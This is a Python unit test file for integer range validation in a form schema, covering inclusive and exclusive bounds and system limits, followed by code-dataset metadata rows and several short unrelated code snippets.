def test_within_range(self):
    """A value inside [minimum, maximum] passes validation."""
    form, field = Mock(), Mock()
    field.data = 10
    validate = NumberRange(minimum=0, maximum=10)
    try:
        validate(form, field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
def test_within_range_at_min(self):
    """A value exactly equal to the minimum passes validation."""
    form, field = Mock(), Mock()
    field.data = 0
    validate = NumberRange(minimum=0, maximum=9999999999)
    try:
        validate(form, field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
def test_within_range_at_max(self):
    """A value exactly equal to the maximum passes validation."""
    form, field = Mock(), Mock()
    field.data = 9999999999
    validate = NumberRange(minimum=0, maximum=9999999999)
    try:
        validate(form, field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
def test_manual_min(self):
    """A schema-supplied min_value and custom message drive the validator."""
    # Answer schema with only a minimum bound and overridden error messages.
    answer = {
        'min_value': {
            'value': 10
        },
        'label': 'Min Test',
        'mandatory': False,
        'validation':
            {
                'messages': {
                    'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                    'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.'
                }
            },
        'id': 'test-range',
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
    self.assertTrue(integer_field.field_class == CustomIntegerField)
    # Pick the NumberRange validator out of the field's validator list;
    # the last matching one is left bound to test_validator.
    for validator in integer_field.kwargs['validators']:
        if isinstance(validator, NumberRange):
            test_validator = validator
    mock_form = Mock()
    # 9 is below the minimum of 10: expect the custom message.
    integer_field.data = 9
    with self.assertRaises(ValidationError) as ite:
        test_validator(mock_form, integer_field)
    self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_SMALL'])
    # 10 sits exactly on the minimum: must validate cleanly.
    try:
        integer_field.data = 10
        test_validator(mock_form, integer_field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
def test_manual_max(self):
    """A schema-supplied max_value and custom message drive the validator."""
    # Answer schema with only a maximum bound and overridden error messages.
    answer = {
        'max_value': {
            'value': 20
        },
        'label': 'Max Test',
        'mandatory': False,
        'validation':
            {
                'messages': {
                    'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                    'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
                }
            },
        'id': 'test-range',
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
    self.assertTrue(integer_field.field_class == CustomIntegerField)
    # Pick the NumberRange validator out of the field's validator list;
    # the last matching one is left bound to test_validator.
    for validator in integer_field.kwargs['validators']:
        if isinstance(validator, NumberRange):
            test_validator = validator
    mock_form = Mock()
    # 21 exceeds the maximum of 20: expect the custom message.
    integer_field.data = 21
    with self.assertRaises(ValidationError) as ite:
        test_validator(mock_form, integer_field)
    self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_LARGE'])
    # 20 sits exactly on the maximum: must validate cleanly.
    try:
        integer_field.data = 20
        test_validator(mock_form, integer_field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
def test_zero_max(self):
    """A maximum of 0 must still be honoured (0 is falsy but valid)."""
    max_value = 0
    answer = {
        'max_value': {
            'value': max_value
        },
        'label': 'Max Test',
        'mandatory': False,
        'id': 'test-range',
        'type': 'Currency'
    }
    label = answer['label']
    # Expected default message rendered with the zero maximum.
    error_message = error_messages['NUMBER_TOO_LARGE'] % dict(max=max_value)
    integer_field = get_number_field(answer, label, '', error_messages, self.store)
    self.assertTrue(integer_field.field_class == CustomIntegerField)
    # Pick the NumberRange validator out of the field's validator list;
    # the last matching one is left bound to test_validator.
    for validator in integer_field.kwargs['validators']:
        if isinstance(validator, NumberRange):
            test_validator = validator
    mock_form = Mock()
    # 1 exceeds the zero maximum: must be rejected.
    integer_field.data = 1
    with self.assertRaises(ValidationError) as ite:
        test_validator(mock_form, integer_field)
    self.assertEqual(str(ite.exception), error_message)
    # 0 equals the maximum: must validate cleanly.
    try:
        integer_field.data = 0
        test_validator(mock_form, integer_field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
def test_zero_min(self):
    """A min_value of 0 is honoured (a falsy bound must not read as unset)."""
    min_value = 0
    answer = {
        'min_value': {
            'value': min_value
        },
        'label': 'Min Test',
        'mandatory': False,
        'id': 'test-range',
        'type': 'Currency'
    }
    label = answer['label']
    # No custom messages on the answer, so the default template is formatted.
    error_message = error_messages['NUMBER_TOO_SMALL'] % dict(min=min_value)
    integer_field = get_number_field(answer, label, '', error_messages, self.store)
    self.assertTrue(integer_field.field_class == CustomIntegerField)
    # Pick out the NumberRange validator attached to the built field.
    for validator in integer_field.kwargs['validators']:
        if isinstance(validator, NumberRange):
            test_validator = validator
    mock_form = Mock()
    # Any value below zero must fail.
    integer_field.data = -1
    with self.assertRaises(ValidationError) as ite:
        test_validator(mock_form, integer_field)
    self.assertEqual(str(ite.exception), error_message)
    # The bound is inclusive, so zero itself must validate cleanly.
    try:
        integer_field.data = 0
        test_validator(mock_form, integer_field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
def test_value_range(self):
    """Both bounds of a schema-defined range are enforced, inclusively."""
    answer = {
        'min_value': {
            'value': 10
        },
        'max_value': {
            'value': 20
        },
        'label': 'Range Test 10 to 20',
        'mandatory': False,
        'validation': {
            'messages': {
                'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
                'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
            }
        },
        'id': 'test-range',
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    # Pass the answer's own messages through, consistent with the other range
    # tests (previously the module-level defaults were passed here while the
    # assertion below compared against the answer-specific messages).
    integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
    self.assertTrue(integer_field.field_class == CustomIntegerField)
    # Pick out the NumberRange validator attached to the built field.
    for validator in integer_field.kwargs['validators']:
        if isinstance(validator, NumberRange):
            test_validator = validator
    mock_form = Mock()
    # Just below the minimum raises with the schema-supplied message.
    integer_field.data = 9
    with self.assertRaises(ValidationError) as ite:
        test_validator(mock_form, integer_field)
    self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_SMALL'])
    # Both bounds are inclusive: 10 and 20 must validate cleanly.
    try:
        integer_field.data = 20
        test_validator(mock_form, integer_field)
        integer_field.data = 10
        test_validator(mock_form, integer_field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
def test_answer_id_range(self):
    """Bounds referenced by answer_id (resolved via the store) are enforced."""
    answer = {
        'min_value': {
            'answer_id': 'set-minimum'
        },
        'max_value': {
            'answer_id': 'set-maximum'
        },
        'label': 'Range Test 10 to 20',
        'mandatory': False,
        'validation': {
            'messages': {
                'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
                'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
            }
        },
        'id': 'test-range',
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    # self.store is expected to resolve 'set-minimum'/'set-maximum' to 10/20.
    integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
    self.assertTrue(integer_field.field_class == CustomIntegerField)
    # Pick out the NumberRange validator attached to the built field.
    for validator in integer_field.kwargs['validators']:
        if isinstance(validator, NumberRange):
            test_validator = validator
    mock_form = Mock()
    # Just below the resolved minimum raises with the schema-supplied message.
    integer_field.data = 9
    with self.assertRaises(ValidationError) as ite:
        test_validator(mock_form, integer_field)
    self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_SMALL'])
    # Both resolved bounds are inclusive.
    try:
        integer_field.data = 20
        test_validator(mock_form, integer_field)
        integer_field.data = 10
        test_validator(mock_form, integer_field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
def test_default_range(self):
    """Without explicit bounds the system limits (0..9999999999) apply."""
    answer = {
        'decimal_places': 2,
        'label': 'Range Test 10 to 20',
        'mandatory': False,
        'validation': {
            'messages': {
                'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
                'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
            }
        },
        'id': 'test-range',
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
    # Pick out the NumberRange validator and check the default bounds.
    for validator in integer_field.kwargs['validators']:
        if isinstance(validator, NumberRange):
            test_validator = validator
    self.assertEqual(test_validator.maximum, 9999999999)
    self.assertEqual(test_validator.minimum, 0)
def test_min_less_than_system_limits(self):
    """A min_value below the system minimum is rejected at field build time."""
    answer = {
        'min_value': {
            'value': -1000000000
        },
        'id': 'test-range',
        'label': 'Range Test 10 to 20',
        'mandatory': False,
        'validation':
            {
                'messages': {
                    'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                    'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
                    'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
                }
            },
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    # Building the field itself must raise: the schema bound is out of range.
    with self.assertRaises(Exception) as ite:
        get_number_field(answer, label, '', returned_error_messages, self.store)
    self.assertEqual(str(ite.exception),
                     'min_value: -1000000000 < system minimum: -999999999 for answer id: test-range')
def test_max_greater_than_system_limits(self):
    """A max_value above the system maximum is rejected at field build time."""
    answer = {
        'max_value': {
            'value': 10000000000
        },
        'id': 'test-range',
        'label': 'Range Test 10 to 20',
        'mandatory': False,
        'validation':
            {
                'messages': {
                    'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                    'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
                    'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
                }
            },
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    # Building the field itself must raise: the schema bound is out of range.
    with self.assertRaises(Exception) as ite:
        get_number_field(answer, label, '', returned_error_messages, self.store)
    self.assertEqual(str(ite.exception),
                     'max_value: 10000000000 > system maximum: 9999999999 for answer id: test-range')
def test_min_greater_than_max(self):
    """An inverted range (min above max) is rejected at field build time."""
    answer = {
        'min_value': {
            'value': 20
        },
        'max_value': {
            'value': 10
        },
        'id': 'test-range',
        'label': 'Range Test 10 to 20',
        'mandatory': False,
        'validation':
            {
                'messages': {
                    'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                    'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
                    'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
                }
            },
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    # Building the field itself must raise on the contradictory bounds.
    with self.assertRaises(Exception) as ite:
        get_number_field(answer, label, '', returned_error_messages, self.store)
    self.assertEqual(str(ite.exception), 'min_value: 20 > max_value: 10 for answer id: test-range')
def test_answer_id_invalid_type(self):
    """A bound referencing a non-numeric answer is rejected at build time."""
    answer = {
        'max_value': {
            'answer_id': 'set-maximum-cat'
        },
        'label': 'Range Test 10 to 20',
        'mandatory': False,
        'validation':
            {
                'messages': {
                    'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                    'NUMBER_TOO_SMALL': 'The minimum value allowed is 10. Please correct your answer.',
                    'NUMBER_TOO_LARGE': 'The maximum value allowed is 20. Please correct your answer.'
                }
            },
        'id': 'test-range',
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    # self.store is expected to resolve 'set-maximum-cat' to the value 'cat'.
    with self.assertRaises(Exception) as ite:
        get_number_field(answer, label, '', returned_error_messages, self.store)
    self.assertEqual(str(ite.exception),
                     'answer: set-maximum-cat value: cat for answer id: test-range is not a valid number')
def test_manual_min_exclusive(self):
    """An exclusive min_value rejects the bound itself, accepts bound + 1."""
    answer = {
        'min_value': {
            'value': 10,
            'exclusive': True
        },
        'label': 'Min Test',
        'mandatory': False,
        'validation':
            {
                'messages': {
                    'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                    'NUMBER_TOO_SMALL_EXCLUSIVE': 'The minimum value allowed is 10. Please correct your answer.'
                }
            },
        'id': 'test-range',
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    # Pass the answer's own messages through, consistent with the other
    # exclusive-bound test (previously the module-level defaults were passed
    # while the assertion below compared against the answer's messages).
    integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
    self.assertTrue(integer_field.field_class == CustomIntegerField)
    # Pick out the NumberRange validator attached to the built field.
    for validator in integer_field.kwargs['validators']:
        if isinstance(validator, NumberRange):
            test_validator = validator
    mock_form = Mock()
    # Exclusive bound: the minimum itself must be rejected.
    integer_field.data = 10
    with self.assertRaises(ValidationError) as ite:
        test_validator(mock_form, integer_field)
    self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_SMALL_EXCLUSIVE'])
    # One above the exclusive minimum must validate cleanly.
    try:
        integer_field.data = 11
        test_validator(mock_form, integer_field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
def test_manual_max_exclusive(self):
    """An exclusive max_value rejects the bound itself, accepts bound - 1."""
    answer = {
        'max_value': {
            'value': 20,
            'exclusive': True
        },
        'label': 'Max Test',
        'mandatory': False,
        'validation':
            {
                'messages': {
                    'INVALID_NUMBER': 'Please only enter whole numbers into the field.',
                    'NUMBER_TOO_LARGE_EXCLUSIVE': 'The maximum value allowed is 20. Please correct your answer.'
                }
            },
        'id': 'test-range',
        'type': 'Currency'
    }
    label = answer['label']
    returned_error_messages = answer['validation']['messages']
    integer_field = get_number_field(answer, label, '', returned_error_messages, self.store)
    self.assertTrue(integer_field.field_class == CustomIntegerField)
    # Pick out the NumberRange validator attached to the built field.
    for validator in integer_field.kwargs['validators']:
        if isinstance(validator, NumberRange):
            test_validator = validator
    mock_form = Mock()
    # Exclusive bound: the maximum itself must be rejected.
    integer_field.data = 20
    with self.assertRaises(ValidationError) as ite:
        test_validator(mock_form, integer_field)
    self.assertEqual(str(ite.exception), returned_error_messages['NUMBER_TOO_LARGE_EXCLUSIVE'])
    # One below the exclusive maximum must validate cleanly.
    try:
        integer_field.data = 19
        test_validator(mock_form, integer_field)
    except ValidationError:
        self.fail('Valid integer raised ValidationError')
| 34.965636
| 118
| 0.567125
| 2,015
| 20,350
| 5.516129
| 0.069975
| 0.066937
| 0.047413
| 0.043185
| 0.879262
| 0.848493
| 0.822582
| 0.801799
| 0.801799
| 0.801619
| 0
| 0.020532
| 0.337052
| 20,350
| 581
| 119
| 35.025818
| 0.80335
| 0.004816
| 0
| 0.690021
| 0
| 0.002123
| 0.22376
| 0.007116
| 0
| 0
| 0
| 0
| 0.080679
| 1
| 0.042463
| false
| 0
| 0.016985
| 0
| 0.061571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3141ee6e2671951af4607884d1245aef7cc0d3cb
| 31
|
py
|
Python
|
AIs/Manoj Bisht/__init__.py
|
YSabarad/monopyly
|
0460f2452c83846b6b9e3b234be411e12a86d69c
|
[
"MIT"
] | 4
|
2015-11-04T21:18:40.000Z
|
2020-12-26T21:15:23.000Z
|
AIs/Manoj Bisht/__init__.py
|
YSabarad/monopyly
|
0460f2452c83846b6b9e3b234be411e12a86d69c
|
[
"MIT"
] | 2
|
2021-08-09T18:19:58.000Z
|
2021-08-10T14:44:54.000Z
|
AIs/Manoj Bisht/__init__.py
|
YSabarad/monopyly
|
0460f2452c83846b6b9e3b234be411e12a86d69c
|
[
"MIT"
] | 6
|
2015-08-01T17:54:17.000Z
|
2022-02-28T00:00:21.000Z
|
from .rimpo_ai import RimpoAI
| 10.333333
| 29
| 0.806452
| 5
| 31
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16129
| 31
| 2
| 30
| 15.5
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
314a751f58afd1795c2cb34a9dc27304b57c5d69
| 6,454
|
py
|
Python
|
autoreglib/model_feature_reg.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
autoreglib/model_feature_reg.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
autoreglib/model_feature_reg.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
"""
モデルベース特徴量選択
教師あり学習モデルを用いて個々の特徴量の重要度を判断して、重要なものだけを残す方法。
特徴選択に使うモデルは最終的に使うモデルと同じでなくてもよい。
SelectFromModelは、フィッティング後に coef_ またはfeature_importances_属性を持つ推定器と一緒に使用できるメタ変換器。
coef_またはfeature_importances_の対応する値が、
指定されたしきい値パラメータを下回る場合、特徴は重要ではないとみなされ、削除されます。
しきい値を数値で指定する以外にも、文字列引数を使用してしきい値を見つけるためのヒューリスティックスが組み込まれています。
利用可能なヒューリスティックスは、「平均」、「中央値」、およびこれらの浮動小数点数の「0.1 *平均」。
反復特徴量選択
すべての特徴量を利用してモデルを作り、そのモデルで最も重要度が低い特徴量を削除する。
そしてまたモデルを作り、事前に定めた数の特徴量まで繰り返す。
このために、計算量ははるかに多い。
Randomforest, Gradientboosting, SVM
"""
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from pandas import Series, DataFrame
import seaborn as sns
sns.set_style('whitegrid')
import scipy as sp
from sklearn.linear_model import LinearRegression
from sklearn.svm import SVR
from sklearn.feature_selection import SelectFromModel
from sklearn.feature_selection import RFE
from sklearn.ensemble import RandomForestRegressor
from sklearn.ensemble import GradientBoostingRegressor
def randomforestreg(X_train, y_train, X_test, y_test, X_name_list, threshold="median"):
    '''
    Feature selection with a RandomForest, two ways:

    1. SelectFromModel: keep features whose importance clears *threshold*,
       then refit a RandomForestRegressor on the kept features and print
       train/test scores.
    2. RFE (recursive feature elimination) with a RandomForestRegressor,
       then fit a LinearRegression on the RFE-selected features.

    Both selection masks are visualised with matplotlib (black = selected).

    :param X_train: training features
    :param y_train: training target
    :param X_test: test features
    :param y_test: test target
    :param X_name_list: feature names (used as x-axis tick labels)
    :param threshold: importance threshold for SelectFromModel
                      ("median", "mean", or e.g. "0.1*mean")
    :return: None (prints scores and shows plots)
    '''
    Xl = list(range(0, len(X_name_list)))
    # Model-based feature selection.
    sfm = SelectFromModel(RandomForestRegressor(), threshold=threshold)
    sfm.fit(X_train, y_train)
    X_train_sfm = sfm.transform(X_train)
    X_test_sfm = sfm.transform(X_test)
    print("X_train.shape: {}".format(X_train.shape))
    print("X_train_sfm.shape: {}".format(X_train_sfm.shape))
    reg2 = RandomForestRegressor()
    reg2.fit(X_train_sfm, y_train)
    print("Select From Model")
    print("Training Best score : {:.3f}".format(reg2.score(X_train_sfm, y_train)))
    print("Test Best score : {:.3f}".format(reg2.score(X_test_sfm, y_test)))
    mask_sfm = sfm.get_support()
    print("RandomForestRegression")
    # visualize the mask_sfm. black is True, white is False
    plt.matshow(mask_sfm.reshape(1, -1), cmap='gray_r')
    plt.yticks(())
    plt.xticks(Xl, X_name_list, rotation=90)
    plt.show()
    # RFE: recursively drop the least important feature.
    rfe = RFE(RandomForestRegressor())
    rfe.fit(X_train, y_train)
    # visualize the selected features:
    mask_rfe = rfe.get_support()
    print("RandomForest")
    plt.matshow(mask_rfe.reshape(1, -1), cmap='gray_r')
    plt.yticks(())
    plt.xticks(Xl, X_name_list, rotation=90)
    X_train_rfe = rfe.transform(X_train)
    X_test_rfe = rfe.transform(X_test)
    print("LinearRegression")
    reg3 = LinearRegression()
    reg3.fit(X_train_rfe, y_train)
    print("Training Best score : {:.3f}".format(reg3.score(X_train_rfe, y_train)))
    print("Test Best score : {:.3f}".format(reg3.score(X_test_rfe, y_test)))
def gradientboostingreg(X_train, y_train, X_test, y_test, X_name_list, threshold="median"):
    '''
    Feature selection with GradientBoosting (SelectFromModel and RFE),
    mirroring randomforestreg; a LinearRegression is fitted on the
    RFE-selected features and scores are printed.

    :param X_train: training features
    :param y_train: training target
    :param X_test: test features
    :param y_test: test target
    :param X_name_list: feature names (used as x-axis tick labels)
    :param threshold: importance threshold for SelectFromModel
    :return: None (prints scores and shows plots)
    '''
    Xl = list(range(0, len(X_name_list)))
    # Model-based feature selection.
    sfm = SelectFromModel(GradientBoostingRegressor(), threshold=threshold)
    sfm.fit(X_train, y_train)
    X_train_sfm = sfm.transform(X_train)
    X_test_sfm = sfm.transform(X_test)
    print("X_train.shape: {}".format(X_train.shape))
    print("X_train_sfm.shape: {}".format(X_train_sfm.shape))
    reg2 = GradientBoostingRegressor()
    reg2.fit(X_train_sfm, y_train)
    print("SFM")
    print("Training Best score : {:.3f}".format(reg2.score(X_train_sfm, y_train)))
    print("Test Best score : {:.3f}".format(reg2.score(X_test_sfm, y_test)))
    mask_sfm = sfm.get_support()
    print("GradientBoosting")
    # visualize the mask_sfm. black is True, white is False
    plt.matshow(mask_sfm.reshape(1, -1), cmap='gray_r')
    plt.yticks(())
    plt.xticks(Xl, X_name_list, rotation=90)
    plt.show()
    # RFE: recursively drop the least important feature.
    rfe = RFE(GradientBoostingRegressor())
    rfe.fit(X_train, y_train)
    # visualize the selected features:
    mask_rfe = rfe.get_support()
    print("GradientBoostingRegressor")
    plt.matshow(mask_rfe.reshape(1, -1), cmap='gray_r')
    plt.yticks(())
    plt.xticks(Xl, X_name_list, rotation=90)
    X_train_rfe = rfe.transform(X_train)
    X_test_rfe = rfe.transform(X_test)
    print("LinearRegression", "RFE")
    reg3 = LinearRegression()
    reg3.fit(X_train_rfe, y_train)
    print("Training Best score : {:.3f}".format(reg3.score(X_train_rfe, y_train)))
    print("Test Best score : {:.3f}".format(reg3.score(X_test_rfe, y_test)))
def svmreg(X_train, y_train, X_test, y_test, X_name_list, threshold="median"):
    '''
    Feature selection driven by an SVR (SelectFromModel and RFE),
    mirroring randomforestreg; a LinearRegression is fitted on the
    RFE-selected features and scores are printed.

    NOTE(review): SelectFromModel/RFE need an estimator exposing coef_ or
    feature_importances_ after fitting; SVR() with its default rbf kernel
    exposes neither, so this likely requires SVR(kernel='linear') — confirm.

    :param X_train: training features
    :param y_train: training target
    :param X_test: test features
    :param y_test: test target
    :param X_name_list: feature names (used as x-axis tick labels)
    :param threshold: importance threshold for SelectFromModel
    :return: None (prints scores and shows plots)
    '''
    Xl = list(range(0, len(X_name_list)))
    # Model-based feature selection.
    sfm = SelectFromModel(SVR(), threshold=threshold)
    sfm.fit(X_train, y_train)
    X_train_sfm = sfm.transform(X_train)
    X_test_sfm = sfm.transform(X_test)
    print("X_train.shape: {}".format(X_train.shape))
    print("X_train_sfm.shape: {}".format(X_train_sfm.shape))
    reg2 = SVR()
    reg2.fit(X_train_sfm, y_train)
    print("SFM")
    print("Training Best score : {:.3f}".format(reg2.score(X_train_sfm, y_train)))
    print("Test Best score : {:.3f}".format(reg2.score(X_test_sfm, y_test)))
    mask_sfm = sfm.get_support()
    # visualize the mask_sfm. black is True, white is False
    plt.matshow(mask_sfm.reshape(1, -1), cmap='gray_r')
    plt.xlabel("SVR")
    plt.yticks(())
    plt.xticks(Xl, X_name_list, rotation=90)
    plt.show()
    # RFE: recursively drop the least important feature.
    rfe = RFE(SVR())
    rfe.fit(X_train, y_train)
    # visualize the selected features:
    mask_rfe = rfe.get_support()
    plt.matshow(mask_rfe.reshape(1, -1), cmap='gray_r')
    plt.yticks(())
    plt.xticks(Xl, X_name_list, rotation=90)
    plt.xlabel("SVR")
    X_train_rfe = rfe.transform(X_train)
    X_test_rfe = rfe.transform(X_test)
    print("LinearRegression")
    reg3 = LinearRegression()
    reg3.fit(X_train_rfe, y_train)
    print("Training Best score : {:.3f}".format(reg3.score(X_train_rfe, y_train)))
    print("Test Best score : {:.3f}".format(reg3.score(X_test_rfe, y_test)))
| 31.637255
| 91
| 0.677564
| 876
| 6,454
| 4.751142
| 0.138128
| 0.069198
| 0.032436
| 0.049015
| 0.73234
| 0.716482
| 0.716482
| 0.716482
| 0.709995
| 0.709995
| 0
| 0.012505
| 0.194608
| 6,454
| 204
| 92
| 31.637255
| 0.788188
| 0.186396
| 0
| 0.723214
| 0
| 0
| 0.131241
| 0.009578
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026786
| false
| 0
| 0.107143
| 0
| 0.133929
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3166b5a3ad3e0bfab5b619020bc4e2ecd55cd4ad
| 191
|
py
|
Python
|
src/gwnet/__init__.py
|
Sunnesoft/g2net-challenge
|
a633719aa8344547a5e79f07180bb424faeab385
|
[
"MIT"
] | null | null | null |
src/gwnet/__init__.py
|
Sunnesoft/g2net-challenge
|
a633719aa8344547a5e79f07180bb424faeab385
|
[
"MIT"
] | null | null | null |
src/gwnet/__init__.py
|
Sunnesoft/g2net-challenge
|
a633719aa8344547a5e79f07180bb424faeab385
|
[
"MIT"
] | null | null | null |
from .gw_cqt_gpu import *
from .gw_device_manager import *
from .gw_dataset import *
from .gw_model import *
from .gw_timeseries import *
from .gw_utils import *
from .gw_spectrogram import *
| 27.285714
| 32
| 0.78534
| 30
| 191
| 4.7
| 0.4
| 0.297872
| 0.510638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141361
| 191
| 7
| 33
| 27.285714
| 0.859756
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
31b97cca1093685f6e9c84c02ab24c719a8bd4fb
| 34
|
py
|
Python
|
unsoliciated/list_open_ports.py
|
Tuutaans/lazy_enumerator
|
91eb059d6c173e60aff590b78f723168cd4264e3
|
[
"MIT"
] | null | null | null |
unsoliciated/list_open_ports.py
|
Tuutaans/lazy_enumerator
|
91eb059d6c173e60aff590b78f723168cd4264e3
|
[
"MIT"
] | 6
|
2022-02-09T15:44:34.000Z
|
2022-02-10T03:48:54.000Z
|
unsoliciated/list_open_ports.py
|
Tuutaans/lazy_enumerator
|
91eb059d6c173e60aff590b78f723168cd4264e3
|
[
"MIT"
] | 2
|
2022-02-09T14:49:25.000Z
|
2022-02-09T16:26:11.000Z
|
def list_open_ports():
    """Placeholder: open-port enumeration is not implemented yet."""
    pass
| 6.8
| 22
| 0.647059
| 5
| 34
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.264706
| 34
| 4
| 23
| 8.5
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
31c449f16c93d4d9579fb9f80c5f1157b93dbc6e
| 89
|
py
|
Python
|
test/tests/decorator_whitespace.py
|
RangelReale/libpypa
|
e4b3c359d3d2a9ccbea1cbb0a977af8219dd64ef
|
[
"Apache-2.0"
] | 152
|
2015-01-01T02:26:21.000Z
|
2022-03-04T12:18:15.000Z
|
test/tests/decorator_whitespace.py
|
kattkieru/libpypa
|
5e7a4833da515d0cd2d850d51f082000c9e9f651
|
[
"Apache-2.0"
] | 43
|
2015-01-22T00:49:10.000Z
|
2019-02-26T22:42:59.000Z
|
test/tests/decorator_whitespace.py
|
kattkieru/libpypa
|
5e7a4833da515d0cd2d850d51f082000c9e9f651
|
[
"Apache-2.0"
] | 42
|
2015-01-02T11:29:49.000Z
|
2022-03-04T12:18:17.000Z
|
# fail-if: '-x' not in EXTRA_JIT_ARGS
def dec(func):
    """Identity decorator: hands the callable back unchanged."""
    return func
@dec
def f():
